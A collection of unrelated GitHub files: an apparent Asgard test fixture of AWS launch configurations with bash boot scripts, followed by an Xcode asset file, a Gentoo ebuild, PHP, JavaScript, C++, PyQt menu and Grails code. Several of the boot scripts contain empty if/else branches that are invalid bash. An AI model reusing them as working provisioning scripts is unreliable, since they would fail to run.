"userData": "#!/bin/bash\n# udf0 begin\nexec 1>/var/ec2/userdata.log\nexec 2>&1\nset -x\n\nPATH=/bin:/usr/bin:/usr/sbin:/sbin\n\napp=\"akms\"\nappenv=\"test\"\nregion=\"us-east-1\"\nappuser=\"${app}${appenv}\"\nstack=\"\"\ncluster=\"akms\"\nautogrp=\"akms-v002\"\nlaunchconfig=\"akms-v002-20111018112415\"\nclusterorapp=${cluster:-$app}\nnflxbase=`rpm -q nflx-base | sed 's:nflx-base-1..-\\(.*\\)$:\\1:'`\nappdynappname=\"$region $appenv\"\n\nsetenv_sh=\"/apps/tomcat/bin/setenv.sh\"\nNFenv=\"/apps/tomcat/bin/netflix.env\"\nserver_template_xml=\"/apps/tomcat/conf/server_template.xml\"\nserver_xml=\"/apps/tomcat/conf/server.xml\"\ninstanceid=`/usr/bin/instance-id`\n\n# udf0 end\n# udf-test begin\n\n# udf-test end\n# udf1 begin\nhostnamestring=${clusterorapp}-${instanceid}\nhostname $hostnamestring\nprintf \"/^HOSTNAME/ d\\n $\\na\\nHOSTNAME=${hostnamestring}\\n.\\nw\\nq\\n\" | ed -s /etc/sysconfig/network\necho \"127.0.0.1 localhost\" > /etc/hosts\nprintf \"%s\\t%s %s.netflix.com %s\\n\" `local-ipv4` `hostname` `hostname` `public-hostname` >> /etc/hosts\ntest -n \"$reg_hosts\" && echo $reg_hosts >> /etc/hosts\n\ncurl=\"curl --retry 3 --silent --show-error --fail\"\nmetadatavars() {\nlocal url=$1\nfor uri in `$curl $url`\ndo\necho $uri | grep -q -E '=' && continue\necho $uri | grep -q -E 'public' && continue\nif echo $uri | grep -q -E '/$'\nthen\nmetadatavars \"${url}${uri}\"\nelse\nprintf \"export EC2_%s=\\\"%s\\\"\\n\" `echo $uri | tr '/-' '_' | tr 'a-z' 'A-Z'` \"`$curl ${url}${uri}| tr '\\n' ' '`\"\nfi\ndone\n}\n\nmetadatavars http://169.254.169.254/latest/meta-data/ >> /etc/profile.d/netflix_environment.sh\n. /etc/profile.d/netflix_environment.sh\n\nln -s $jmxf $jmxl\n\nif newbase\nthen\n/usr/local/bin/installcrontab $appuser\nelse\nfi\n\nif ! grep -q '/etc/alternatives/java_sdk/lib/tools.jar' /apps/tomcat/bin/setclasspath.sh\nthen\nfi\n\n# udf1 end\n\nserver_template_crl=/apps/tomcat/conf/server_template_2011.xml \n\n# end added for CRL support\n\ntouch /tmp/udf-complete\n# udf2 end\n\n"
},
{
"blockDeviceMappings":
[
],
"class": "com.amazonaws.services.autoscaling.model.LaunchConfiguration",
"createdTime": "2011-10-18T21:10:10Z",
"imageId": "ami-fd5f9394",
"instanceMonitoring": {
"class": "com.amazonaws.services.autoscaling.model.InstanceMonitoring",
"enabled": true
},
"instanceType": "m1.large",
"kernelId": "",
"keyName": "nf-test-keypair-a",
"launchConfigurationARN": "arn:aws:autoscaling:us-east-1:179000000000:launchConfiguration:53be19fa-d544-40d1-a00d-cacb6ce29fa3:launchConfigurationName/akms-v002-20111018141009",
"launchConfigurationName": "akms-v002-20111018141009",
"ramdiskId": "",
"securityGroups":
[
"akms",
"nf-datacenter",
"nf-infrastructure"
],
"userData": "#!/bin/bash\n# udf0 begin\nexec 1>/var/ec2/userdata.log\nexec 2>&1\nset -x\n\nPATH=/bin:/usr/bin:/usr/sbin:/sbin\n\napp=\"akms\"\nappenv=\"test\"\nregion=\"us-east-1\"\nappuser=\"${app}${appenv}\"\nstack=\"\"\ncluster=\"akms\"\nautogrp=\"akms-v002\"\nlaunchconfig=\"akms-v002-20111018141009\"\nclusterorapp=${cluster:-$app}\nnflxbase=`rpm -q nflx-base | sed 's:nflx-base-1..-\\(.*\\)$:\\1:'`\nappdynappname=\"$region $appenv\"\n\nsetenv_sh=\"/apps/tomcat/bin/setenv.sh\"\nNFenv=\"/apps/tomcat/bin/netflix.env\"\nserver_template_xml=\"/apps/tomcat/conf/server_template.xml\"\nserver_xml=\"/apps/tomcat/conf/server.xml\"\ninstanceid=`/usr/bin/instance-id`\n\n# udf0 end\n# udf-test begin\n\n# udf-test end\n# udf1 begin\nhostnamestring=${clusterorapp}-${instanceid}\nhostname $hostnamestring\nprintf \"/^HOSTNAME/ d\\n $\\na\\nHOSTNAME=${hostnamestring}\\n.\\nw\\nq\\n\" | ed -s /etc/sysconfig/network\necho \"127.0.0.1 localhost\" > /etc/hosts\nprintf \"%s\\t%s %s.netflix.com %s\\n\" `local-ipv4` `hostname` `hostname` `public-hostname` >> /etc/hosts\ntest -n \"$reg_hosts\" && echo $reg_hosts >> /etc/hosts\n\ncurl=\"curl --retry 3 --silent --show-error --fail\"\nmetadatavars() {\nlocal url=$1\nfor uri in `$curl $url`\ndo\necho $uri | grep -q -E '=' && continue\necho $uri | grep -q -E 'public' && continue\nif echo $uri | grep -q -E '/$'\nthen\nmetadatavars \"${url}${uri}\"\nelse\nprintf \"export EC2_%s=\\\"%s\\\"\\n\" `echo $uri | tr '/-' '_' | tr 'a-z' 'A-Z'` \"`$curl ${url}${uri}| tr '\\n' ' '`\"\nfi\ndone\n}\n\nmetadatavars http://169.254.169.254/latest/meta-data/ >> /etc/profile.d/netflix_environment.sh\n. /etc/profile.d/netflix_environment.sh\n\nln -s $jmxf $jmxl\n\nif newbase\nthen\n/usr/local/bin/installcrontab $appuser\nelse\nfi\n\nif ! grep -q '/etc/alternatives/java_sdk/lib/tools.jar' /apps/tomcat/bin/setclasspath.sh\nthen\nfi\n\n# udf1 end\n\nserver_template_crl=/apps/tomcat/conf/server_template_2011.xml \n\n# end added for CRL support\n\ntouch /tmp/udf-complete\n# udf2 end\n\n"
},
{
"blockDeviceMappings":
[
],
"class": "com.amazonaws.services.autoscaling.model.LaunchConfiguration",
"createdTime": "2011-10-14T23:52:41Z",
"imageId": "ami-4775b32e",
"instanceMonitoring": {
"class": "com.amazonaws.services.autoscaling.model.InstanceMonitoring",
"enabled": true
},
"instanceType": "m1.large",
"kernelId": "",
"keyName": "nf-test-keypair-a",
"launchConfigurationARN": "arn:aws:autoscaling:us-east-1:179000000000:launchConfiguration:c774340b-32c0-49b3-b37e-c551c296a2c2:launchConfigurationName/helloworld-example-v015-20111014165240",
"launchConfigurationName": "helloworld-example-v015-20111014165240",
"ramdiskId": "",
"securityGroups":
[
"helloworld",
"helloworld-frontend",
"helloworld-asgardtest",
"nf-datacenter",
"nf-infrastructure"
],
"userData": "#!/bin/bash\n# udf0 begin\nexec 1>/var/ec2/userdata.log\nexec 2>&1\nset -x\n\nPATH=/bin:/usr/bin:/usr/sbin:/sbin\n\napp=\"helloworld\"\nappenv=\"test\"\nregion=\"us-east-1\"\nappuser=\"${app}${appenv}\"\nstack=\"example\"\ncluster=\"helloworld-example\"\nautogrp=\"helloworld-example-v015\"\nlaunchconfig=\"helloworld-example-v015-20111014165240\"\nclusterorapp=${cluster:-$app}\nnflxbase=`rpm -q nflx-base | sed 's:nflx-base-1..-\\(.*\\)$:\\1:'`\nappdynappname=\"$region $appenv\"\n\nsetenv_sh=\"/apps/tomcat/bin/setenv.sh\"\nNFenv=\"/apps/tomcat/bin/netflix.env\"\nserver_template_xml=\"/apps/tomcat/conf/server_template.xml\"\nserver_xml=\"/apps/tomcat/conf/server.xml\"\ninstanceid=`/usr/bin/instance-id`\n\n# udf0 end\n# udf-test begin\n\n# udf-test end\n# udf1 begin\nhostnamestring=${clusterorapp}-${instanceid}\nhostname $hostnamestring\nprintf \"/^HOSTNAME/ d\\n $\\na\\nHOSTNAME=${hostnamestring}\\n.\\nw\\nq\\n\" | ed -s /etc/sysconfig/network\necho \"127.0.0.1 localhost\" > /etc/hosts\nprintf \"%s\\t%s %s.netflix.com %s\\n\" `local-ipv4` `hostname` `hostname` `public-hostname` >> /etc/hosts\ntest -n \"$reg_hosts\" && echo $reg_hosts >> /etc/hosts\n\ncurl=\"curl --retry 3 --silent --show-error --fail\"\nmetadatavars() {\nlocal url=$1\nfor uri in `$curl $url`\ndo\necho $uri | grep -q -E '=' && continue\necho $uri | grep -q -E 'public' && continue\nif echo $uri | grep -q -E '/$'\nthen\nmetadatavars \"${url}${uri}\"\nelse\nprintf \"export EC2_%s=\\\"%s\\\"\\n\" `echo $uri | tr '/-' '_' | tr 'a-z' 'A-Z'` \"`$curl ${url}${uri}| tr '\\n' ' '`\"\nfi\ndone\n}\n\nmetadatavars http://169.254.169.254/latest/meta-data/ >> /etc/profile.d/netflix_environment.sh\n. /etc/profile.d/netflix_environment.sh\n\nln -s $jmxf $jmxl\n\nif newbase\nthen\n/usr/local/bin/installcrontab $appuser\nelse\nfi\n\nif ! 
grep -q '/etc/alternatives/java_sdk/lib/tools.jar' /apps/tomcat/bin/setclasspath.sh\nthen\nfi\n\n# udf1 end\n# helloworld-example-test\n# asgardtest push adds this text to user data in all ASGs that are part of the helloworld-example cluster,\n# including ASGs helloworld-example and helloworld-example-v001 and helloworld-example-v002\n# Combined custom UDFs for an instance must stay below 9000 characters.\n\n# Environment variable can be read in Java code on the instance like this:\n# String flavor = System.getenv(\"FAVORITE_GELATO_FLAVOR\")\ncat <<EndOfInput>> /etc/profile.d/netflix_environment.sh\nexport FAVORITE_GELATO_FLAVOR=\"Coconut Pistachio\"\nexport FAVORITE_MUSICAL_INSTRUMENT=\"Acoustic Guitar\"\nEndOfInput\n\n# helloworld-test for us-east-1\n# asgardtest push adds this text to user data for all helloworld instances in us-east-1.\n# Combined custom UDFs for an instance must stay below 9000 characters.\n\n# Use Java to read environment variables set here.\n# String pizzaToppings = System.getenv(\"FAVORITE_PIZZA_TOPPINGS\")\ncat <<EndOfInput>> /etc/profile.d/netflix_environment.sh\nexport FAVORITE_PIZZA_TOPPINGS=\"Artichokes and Olives\"\nexport FAVORITE_BEVERAGE=\"Sherry\"\nEndOfInput\n\n# helloworld-example-test for us-east-1\n# asgardtest push adds this text to user data in all ASGs that are part of the helloworld-example cluster in us-east-1,\n# including ASGs helloworld-example and helloworld-example-v001 and helloworld-example-v002\n# Combined custom UDFs for an instance must stay below 9000 characters.\n\n# Environment variable can be read in Java code on the instance like this:\n# String flavor = System.getenv(\"FAVORITE_GELATO_FLAVOR\")\ncat <<EndOfInput>> /etc/profile.d/netflix_environment.sh\nexport FAVORITE_GELATO_FLAVOR=\"Campfire Banana\"\nexport FAVORITE_MUSICAL_INSTRUMENT=\"Irish Flute\"\nEndOfInput\n\n# udf2 begin\nchown -R ${appuser}:asgard /apps\ntouch /tmp/udf-complete\n# udf2 end\n\n"
},
{
"blockDeviceMappings":
[
],
"class": "com.amazonaws.services.autoscaling.model.LaunchConfiguration",
"createdTime": "2011-07-21T17:10:40Z",
"imageId": "ami-dfdd1ab6",
"instanceMonitoring": {
"class": "com.amazonaws.services.autoscaling.model.InstanceMonitoring",
"enabled": true
},
"instanceType": "m1.large",
"kernelId": "",
"keyName": "nf-test-keypair-a",
"launchConfigurationARN": "arn:aws:autoscaling:us-east-1:179000000000:launchConfiguration:b647eb22-906f-4b91-833a-c7c714cf6f3b:launchConfigurationName/ntsuiboot-v000-20110721101039",
"launchConfigurationName": "ntsuiboot-v000-20110721101039",
"ramdiskId": "",
"securityGroups":
[
"nf-datacenter",
"nf-infrastructure",
"ntsuiboot"
],
"userData": "#!/bin/bash\n# udf0 begin\nexec 1>/var/ec2/userdata.log\nexec 2>&1\nset -x\n\nPATH=/bin:/usr/bin:/usr/sbin:/sbin\n\napp=\"ntsuiboot\"\nappenv=\"test\"\nregion=\"us-east-1\"\nappuser=\"${app}${appenv}\"\nstack=\"\"\ncluster=\"ntsuiboot\"\nautogrp=\"ntsuiboot-v000\"\nlaunchconfig=\"ntsuiboot-v000-20110721101039\"\nclusterorapp=${cluster:-$app}\nnflxbase=`rpm -q nflx-base | sed 's:nflx-base-1..-\\(.*\\)$:\\1:'`\n\nsetenv_sh=\"/apps/tomcat/bin/setenv.sh\"\nNFenv=\"/apps/tomcat/bin/netflix.env\"\nserver_template_xml=\"/apps/tomcat/conf/server_template.xml\"\nserver_xml=\"/apps/tomcat/conf/server.xml\"\ninstanceid=`/usr/bin/instance-id`\n\n# udf0 end\n# udf-test begin\nappdynappname=\"Cloud Milestones - test AWS\"\n\ntouch /tmp/udf-complete\n# udf2 end\n\n"
},
{
"blockDeviceMappings":
[
],
"class": "com.amazonaws.services.autoscaling.model.LaunchConfiguration",
"createdTime": "2011-10-18T19:45:26Z",
"imageId": "ami-fba96692",
"instanceMonitoring": {
"class": "com.amazonaws.services.autoscaling.model.InstanceMonitoring",
"enabled": true
},
"instanceType": "m1.large",
"kernelId": "",
"keyName": "nf-test-keypair-a",
"launchConfigurationARN": "arn:aws:autoscaling:us-east-1:179000000000:launchConfiguration:e5e439c9-627e-45db-ba8d-ad920fc84823:launchConfigurationName/ntsuiboot-v001-20111018124526",
"launchConfigurationName": "ntsuiboot-v001-20111018124526",
"ramdiskId": "",
"securityGroups":
[
"nf-datacenter",
"nf-infrastructure",
"ntsuiboot"
],
"userData": "#!/bin/bash\n# udf0 begin\nexec 1>/var/ec2/userdata.log\nexec 2>&1\nset -x\n\nPATH=/bin:/usr/bin:/usr/sbin:/sbin\n\napp=\"ntsuiboot\"\nappenv=\"test\"\nregion=\"us-east-1\"\nappuser=\"${app}${appenv}\"\nstack=\"\"\ncluster=\"ntsuiboot\"\nautogrp=\"ntsuiboot-v001\"\nlaunchconfig=\"ntsuiboot-v001-20111018124526\"\nclusterorapp=${cluster:-$app}\nnflxbase=`rpm -q nflx-base | sed 's:nflx-base-1..-\\(.*\\)$:\\1:'`\nappdynappname=\"$region $appenv\"\n\nsetenv_sh=\"/apps/tomcat/bin/setenv.sh\"\nNFenv=\"/apps/tomcat/bin/netflix.env\"\nserver_template_xml=\"/apps/tomcat/conf/server_template.xml\"\nserver_xml=\"/apps/tomcat/conf/server.xml\"\ninstanceid=`/usr/bin/instance-id`\n\n# udf0 end\n# udf-test begin\n\n# udf-test end\n# udf1 begin\nhostnamestring=${clusterorapp}-${instanceid}\nhostname $hostnamestring\nprintf \"/^HOSTNAME/ d\\n $\\na\\nHOSTNAME=${hostnamestring}\\n.\\nw\\nq\\n\" | ed -s /etc/sysconfig/network\necho \"127.0.0.1 localhost\" > /etc/hosts\nprintf \"%s\\t%s %s.netflix.com %s\\n\" `local-ipv4` `hostname` `hostname` `public-hostname` >> /etc/hosts\ntest -n \"$reg_hosts\" && echo $reg_hosts >> /etc/hosts\n\ncurl=\"curl --retry 3 --silent --show-error --fail\"\nmetadatavars() {\nlocal url=$1\nfor uri in `$curl $url`\ndo\necho $uri | grep -q -E '=' && continue\necho $uri | grep -q -E 'public' && continue\nif echo $uri | grep -q -E '/$'\nthen\nmetadatavars \"${url}${uri}\"\nelse\nprintf \"export EC2_%s=\\\"%s\\\"\\n\" `echo $uri | tr '/-' '_' | tr 'a-z' 'A-Z'` \"`$curl ${url}${uri}| tr '\\n' ' '`\"\nfi\ndone\n}\n\nmetadatavars http://169.254.169.254/latest/meta-data/ >> /etc/profile.d/netflix_environment.sh\n. /etc/profile.d/netflix_environment.sh\n\nln -s $jmxf $jmxl\n\nif newbase\nthen\n/usr/local/bin/installcrontab $appuser\nelse\nfi\n\nif ! grep -q '/etc/alternatives/java_sdk/lib/tools.jar' /apps/tomcat/bin/setclasspath.sh\nthen\nfi\n\n# udf1 end\n# udf2 begin\nchown -R ${appuser}:asgard /apps\ntouch /tmp/udf-complete\n# udf2 end\n\n"
}
]
| {
"pile_set_name": "Github"
} |
{
"images" : [
{
"idiom" : "universal",
"scale" : "1x"
},
{
"idiom" : "universal",
"filename" : "[email protected]",
"scale" : "2x"
},
{
"idiom" : "universal",
"filename" : "[email protected]",
"scale" : "3x"
}
],
"info" : {
"version" : 1,
"author" : "xcode"
}
}
| {
"pile_set_name": "Github"
} |
# Copyright 1999-2020 Gentoo Authors
# Distributed under the terms of the GNU General Public License v2
EAPI=7
# ebuild generated by hackport 0.6.1.9999
CABAL_FEATURES="lib profile haddock hoogle hscolour test-suite"
inherit haskell-cabal
DESCRIPTION="Generic programming library for generalised deriving"
HOMEPAGE="https://github.com/dreixel/generic-deriving"
SRC_URI="https://hackage.haskell.org/package/${P}/${P}.tar.gz"
LICENSE="BSD"
SLOT="0/${PV}"
KEYWORDS="~amd64 ~x86"
IUSE=""
RDEPEND=">=dev-haskell/th-abstraction-0.3:=[profile?] <dev-haskell/th-abstraction-0.4:=[profile?]
>=dev-lang/ghc-7.4.1:=
"
DEPEND="${RDEPEND}
>=dev-haskell/cabal-1.10
test? ( >=dev-haskell/hspec-2 <dev-haskell/hspec-3 )
"
| {
"pile_set_name": "Github"
} |
<?php
namespace Oro\Component\Action\Action;
use Oro\Component\Action\Exception\InvalidParameterException;
use Symfony\Component\PropertyAccess\PropertyPathInterface;
/**
* Increases or decreases an integer attribute by the given value (default 1)
*
* Usage:
* @increase_value:
* attribute: $.some_value
* value: 5
*
* OR
*
* @increase_value:
* attribute: $.some_value
* value: -5
*
* OR
*
* @increase_value: [$.some_value, 5]
*
* OR
*
* @increase_value: $.some_value
*/
class IncreaseValue extends AbstractAction
{
/**
* @var array
*/
protected $options = [];
/**
* {@inheritdoc}
*/
public function initialize(array $options)
{
$count = count($options);
if ($count < 1) {
throw new InvalidParameterException('Attribute parameter is required.');
}
if (!isset($options['attribute']) && !isset($options[0])) {
throw new InvalidParameterException('Attribute must be defined.');
}
if (!($this->getAttribute($options) instanceof PropertyPathInterface)) {
throw new InvalidParameterException('Attribute must be valid property definition.');
}
$value = $this->getValue($options);
if (!is_int($value)) {
throw new InvalidParameterException('Value must be integer.');
}
$this->options = $options;
return $this;
}
/**
* @param array $options
*
* @return mixed
*/
protected function getAttribute(array $options)
{
return array_key_exists('attribute', $options) ? $options['attribute'] : $options[0];
}
/**
* @param array $options
*
* @return mixed
*/
protected function getValue(array $options)
{
$value = 1;
if (isset($options['value'])) {
$value = $options['value'];
} elseif (isset($options[1])) {
$value = $options[1];
}
return $value;
}
/**
* {@inheritdoc}
*/
protected function executeAction($context)
{
$attribute = $this->getAttribute($this->options);
$value = $this->getValue($this->options);
$result = (int)$this->contextAccessor->getValue($context, $attribute);
$result += (int)$this->contextAccessor->getValue($context, $value);
$this->contextAccessor->setValue($context, $attribute, $result);
}
}
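// Hedged usage sketch (illustrative; the ContextAccessor constructor wiring
// below is an assumption based on how actions in this package are typically
// built, not a documented API):
//   $action = new IncreaseValue(new ContextAccessor());
//   $action->initialize(['attribute' => $someValuePath, 'value' => 5]);
//   $action->execute($context); // $.some_value is increased by 5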
| {
"pile_set_name": "Github"
} |
import { normalizeObjectUnits } from '../units/aliases';
import { configFromArray } from './from-array';
import map from '../utils/map';
export function configFromObject(config) {
if (config._d) {
return;
}
var i = normalizeObjectUnits(config._i);
config._a = map([i.year, i.month, i.day || i.date, i.hour, i.minute, i.second, i.millisecond], function (obj) {
return obj && parseInt(obj, 10);
});
configFromArray(config);
}
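// Hedged sketch of the shapes involved (inferred from the unit names above;
// the example values are assumptions, not part of the original module):
//   config._i = { year: 2020, month: 0, day: 15, hour: 9 }
//   => config._a = [2020, 0, 15, 9, undefined, undefined, undefined]
// configFromArray(config) then fills the remaining slots with defaults.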
| {
"pile_set_name": "Github"
} |
/*=============================================================================
Copyright (c) 2001-2011 Joel de Guzman
Copyright (c) 2001-2011 Hartmut Kaiser
Copyright (c) 2009 Francois Barel
http://spirit.sourceforge.net/
Distributed under the Boost Software License, Version 1.0. (See accompanying
file LICENSE_1_0.txt or copy at http://www.boost.org/LICENSE_1_0.txt)
=============================================================================*/
#ifndef BOOST_SPIRIT_REPOSITORY_INCLUDE_KARMA_SUBRULE
#define BOOST_SPIRIT_REPOSITORY_INCLUDE_KARMA_SUBRULE
#if defined(_MSC_VER)
#pragma once
#endif
#include <boost/spirit/repository/home/karma/nonterminal/subrule.hpp>
#endif
| {
"pile_set_name": "Github"
} |
"""
Windows that want to plug in their own menu entries must implement:
- setupMenu(menuBar)
- menuBar()
- setMenuBar(menuBar)
"""
from PyQt5.QtGui import QKeySequence
from PyQt5.QtWidgets import QAction, QApplication, QMenu, QMenuBar
from trufont.tools import platformSpecific
MAX_RECENT_FILES = 10
class MenuBar(QMenuBar):
def __init__(self, parent=None):
super().__init__(parent)
self._spawnElementsHint = True
def shouldSpawnElements(self):
return self.parent() is None or self._spawnElementsHint
def spawnElementsHint(self):
return self._spawnElementsHint
def setSpawnElementsHint(self, value):
self._spawnElementsHint = value
def fetchMenu(self, title):
title = _trMenuString(title)
# cache lookup
child = None
for child_ in self.children():
if not isinstance(child_, QMenu):
continue
if child_.title() == title:
child = child_
if child is not None:
return child
# spawn
menu = Menu(title, self)
if self.shouldSpawnElements():
self.addMenu(menu)
return menu
def resetState(self):
for menu in self.children():
if not isinstance(menu, QMenu):
continue
menu.resetState()
class Menu(QMenu):
def shouldSpawnElements(self):
parent = self.parent()
if parent is not None:
return parent.shouldSpawnElements()
return False
def fetchAction(self, text, callback=None, shortcut=None):
if shortcut is None:
shortcut = _shortcuts.get(text)
text = _trMenuString(text)
# cache lookup
action = None
for action_ in self.actions():
if action_.text() == text:
action = action_
# spawn
if action is None:
action = QAction(text, self)
if self.shouldSpawnElements():
self.addAction(action)
# connect
action.setEnabled(True)
try:
action.triggered.disconnect()
except TypeError:
pass
if callback is not None:
action.triggered.connect(lambda: callback())
action.setShortcut(QKeySequence(shortcut))
return action
fetchMenu = MenuBar.fetchMenu
def resetState(self):
self._ready = True
# TODO: reset submenus too?
for action in self.actions():
action.setEnabled(False)
class Entries:
File = "&File"
File_New = "&New…"
File_Open = "&Open…"
File_Open_Recent = "Open &Recent"
File_Import = "&Import…"
File_Save = "&Save"
File_Save_As = "Save &As…"
File_Save_All = "Save A&ll"
File_Close = "&Close"
File_Reload = "&Revert"
File_Export = "&Export…"
File_Exit = "E&xit"
Edit = "&Edit"
Edit_Undo = "&Undo"
Edit_Redo = "&Redo"
Edit_Cut = "C&ut"
Edit_Copy = "&Copy"
Edit_Copy_As_Component = "Copy &As Component"
Edit_Paste = "&Paste"
Edit_Clear = "Cl&ear"
Edit_Select_All = "&Select All"
Edit_Deselect = "&Deselect"
Edit_Find = "&Find…"
Edit_Settings = "&Settings…"
View = "&View"
View_Zoom_In = "Zoom &In"
View_Zoom_Out = "Zoom &Out"
View_Reset_Zoom = "&Reset Zoom"
View_Next_Tab = "&Next Tab"
View_Previous_Tab = "&Previous Tab"
View_Next_Glyph = "&Next Glyph"
View_Previous_Glyph = "&Previous Glyph"
View_Layer_Up = "Layer &Up"
View_Layer_Down = "Layer &Down"
View_Show_Points = "Show P&oints"
View_Show_Coordinates = "Show &Coordinates"
View_Show_Coordinates_When_Selected = "Show Coordinates When &Selected"
View_Show_Point_Coordinates = "Always Show &Point Coordinates"
View_Show_Bezier_Handles_Coordinates = "Always Show &Bezier Handles Coordinates"
View_Show_Metrics = "Show &Metrics"
View_Show_Images = "Show &Images"
View_Show_Guidelines = "Show &Guidelines"
Font = "F&ont"
Font_Font_Info = "Font &Info"
Font_Font_Features = "Font &Features"
Font_Add_Glyphs = "&Add Glyphs…"
Font_Sort = "&Sort…"
Scripts = "&Scripts"
Scripts_Build_Extension = "&Build Extension…"
# TODO: remove metrics
Window = "&Window"
Window_Minimize = "&Minimize"
Window_Minimize_All = "Minimize &All"
Window_Zoom = "&Zoom"
Window_Groups = "&Groups"
Window_Kerning = "&Kerning"
Window_Metrics = "M&etrics"
Window_Scripting = "&Scripting"
Window_Properties = "&Properties"
Window_Output = "&Output"
Help = "&Help"
Help_Documentation = "&Documentation"
Help_Report_An_Issue = "&Report an Issue"
Help_About = "&About"
_shortcuts = {
Entries.File_New: QKeySequence.New,
Entries.File_Open: QKeySequence.Open,
Entries.File_Save: QKeySequence.Save,
Entries.File_Save_As: QKeySequence.SaveAs,
Entries.File_Close: platformSpecific.closeKeySequence(),
Entries.File_Export: "Ctrl+E",
Entries.File_Exit: QKeySequence.Quit,
Entries.Edit_Undo: QKeySequence.Undo,
Entries.Edit_Redo: QKeySequence.Redo,
Entries.Edit_Cut: QKeySequence.Cut,
Entries.Edit_Copy: QKeySequence.Copy,
Entries.Edit_Copy_As_Component: "Ctrl+Alt+C",
Entries.Edit_Paste: QKeySequence.Paste,
Entries.Edit_Select_All: QKeySequence.SelectAll,
Entries.Edit_Deselect: "Ctrl+D",
Entries.Edit_Find: QKeySequence.Find,
Entries.View_Zoom_In: QKeySequence.ZoomIn,
Entries.View_Zoom_Out: QKeySequence.ZoomOut,
Entries.View_Reset_Zoom: "Ctrl+0",
Entries.View_Next_Tab: QKeySequence.NextChild,
Entries.View_Previous_Tab: platformSpecific.previousTabSequence(),
Entries.View_Next_Glyph: "End",
Entries.View_Previous_Glyph: "Home",
Entries.View_Layer_Up: "PgUp",
Entries.View_Layer_Down: "PgDown",
Entries.View_Show_Points: "Ctrl+Shift+N",
Entries.View_Show_Metrics: "Ctrl+Shift+M",
Entries.View_Show_Guidelines: "Ctrl+Shift+G",
Entries.Font_Font_Info: "Ctrl+Alt+I",
Entries.Font_Font_Features: "Ctrl+Alt+F",
Entries.Font_Add_Glyphs: "Ctrl+G",
Entries.Window_Minimize: "Ctrl+M",
Entries.Window_Groups: "Ctrl+Alt+G",
Entries.Window_Kerning: "Ctrl+Alt+K",
Entries.Window_Metrics: "Ctrl+Alt+S",
Entries.Window_Scripting: "Ctrl+Alt+R",
Entries.Window_Properties: "Ctrl+Alt+P",
Entries.Window_Output: "Ctrl+Alt+O",
}
def globalMenuBar():
    menuBar = MenuBar()
    fileMenu = menuBar.fetchMenu(Entries.File)
    fileMenu.fetchAction(Entries.File_New)
    fileMenu.fetchAction(Entries.File_Open)
    fileMenu.fetchMenu(Entries.File_Open_Recent)
    # no-op, caller will maintain this
    if not platformSpecific.mergeOpenAndImport():
        fileMenu.fetchAction(Entries.File_Import)
    fileMenu.addSeparator()
    fileMenu.fetchAction(Entries.File_Save)
    fileMenu.fetchAction(Entries.File_Save_As)
    fileMenu.fetchAction(Entries.File_Save_All)
    fileMenu.fetchAction(Entries.File_Close)
    fileMenu.fetchAction(Entries.File_Reload)
    fileMenu.addSeparator()
    fileMenu.fetchAction(Entries.File_Export)
    fileMenu.fetchAction(Entries.File_Exit)
    editMenu = menuBar.fetchMenu(Entries.Edit)
    editMenu.fetchAction(Entries.Edit_Undo)
    editMenu.fetchAction(Entries.Edit_Redo)
    editMenu.addSeparator()
    editMenu.fetchAction(Entries.Edit_Cut)
    editMenu.fetchAction(Entries.Edit_Copy)
    editMenu.fetchAction(Entries.Edit_Copy_As_Component)
    editMenu.fetchAction(Entries.Edit_Paste)
    editMenu.fetchAction(Entries.Edit_Clear)
    editMenu.fetchAction(Entries.Edit_Select_All)
    # editMenu.fetchAction(Entries.Edit_Deselect)
    editMenu.fetchAction(Entries.Edit_Find)
    editMenu.addSeparator()
    editMenu.fetchAction(Entries.Edit_Settings)
    menuBar.addMenu(editMenu)
    viewMenu = menuBar.fetchMenu(Entries.View)
    viewMenu.fetchAction(Entries.View_Zoom_In)
    viewMenu.fetchAction(Entries.View_Zoom_Out)
    viewMenu.fetchAction(Entries.View_Reset_Zoom)
    viewMenu.addSeparator()
    viewMenu.fetchAction(Entries.View_Next_Tab)
    viewMenu.fetchAction(Entries.View_Previous_Tab)
    viewMenu.fetchAction(Entries.View_Next_Glyph)
    viewMenu.fetchAction(Entries.View_Previous_Glyph)
    viewMenu.fetchAction(Entries.View_Layer_Up)
    viewMenu.fetchAction(Entries.View_Layer_Down)
    viewMenu.addSeparator()
    viewMenu.fetchAction(Entries.View_Show_Points)
    coordinatesSubmenu = viewMenu.fetchMenu(Entries.View_Show_Coordinates)
    coordinatesSubmenu.fetchAction(Entries.View_Show_Coordinates_When_Selected)
    coordinatesSubmenu.fetchAction(Entries.View_Show_Point_Coordinates)
    coordinatesSubmenu.fetchAction(Entries.View_Show_Bezier_Handles_Coordinates)
    viewMenu.fetchAction(Entries.View_Show_Metrics)
    viewMenu.fetchAction(Entries.View_Show_Images)
    viewMenu.fetchAction(Entries.View_Show_Guidelines)
    fontMenu = menuBar.fetchMenu(Entries.Font)
    fontMenu.fetchAction(Entries.Font_Font_Info)
    fontMenu.fetchAction(Entries.Font_Font_Features)
    fontMenu.addSeparator()
    fontMenu.fetchAction(Entries.Font_Add_Glyphs)
    fontMenu.fetchAction(Entries.Font_Sort)
    menuBar.fetchMenu(Entries.Scripts)
    # no-op, caller will maintain this
    windowMenu = menuBar.fetchMenu(Entries.Window)
    if platformSpecific.windowCommandsInMenu():
        windowMenu.fetchAction(Entries.Window_Minimize)
        windowMenu.fetchAction(Entries.Window_Minimize_All)
        windowMenu.fetchAction(Entries.Window_Zoom)
        windowMenu.addSeparator()
    windowMenu.fetchAction(Entries.Window_Groups)
    windowMenu.fetchAction(Entries.Window_Kerning)
    windowMenu.fetchAction(Entries.Window_Metrics)
    windowMenu.fetchAction(Entries.Window_Scripting)
    windowMenu.fetchAction(Entries.Window_Properties)
    windowMenu.addSeparator()
    windowMenu.fetchAction(Entries.Window_Output)
    helpMenu = menuBar.fetchMenu(Entries.Help)
    helpMenu.fetchAction(Entries.Help_Documentation)
    helpMenu.fetchAction(Entries.Help_Report_An_Issue)
    helpMenu.addSeparator()
    helpMenu.fetchAction(Entries.Help_About)
    return menuBar


def _trMenuString(string):
    return QApplication.translate("AppMenu", string)
| {
"pile_set_name": "Github"
} |
package rest
import grails.converters.JSON
import grails.plugin.springsecurity.annotation.Secured
import grails.plugin.springsecurity.rest.token.AccessToken
class JwtController {
def springSecurityService
@Secured(['ROLE_USER'])
def claims() {
AccessToken accessToken = springSecurityService.authentication as AccessToken
render accessToken.accessTokenJwt.JWTClaimsSet.claims as JSON
}
}
| {
"pile_set_name": "Github"
} |
/*
* Copyright (C) 2014 The Android Open Source Project
*
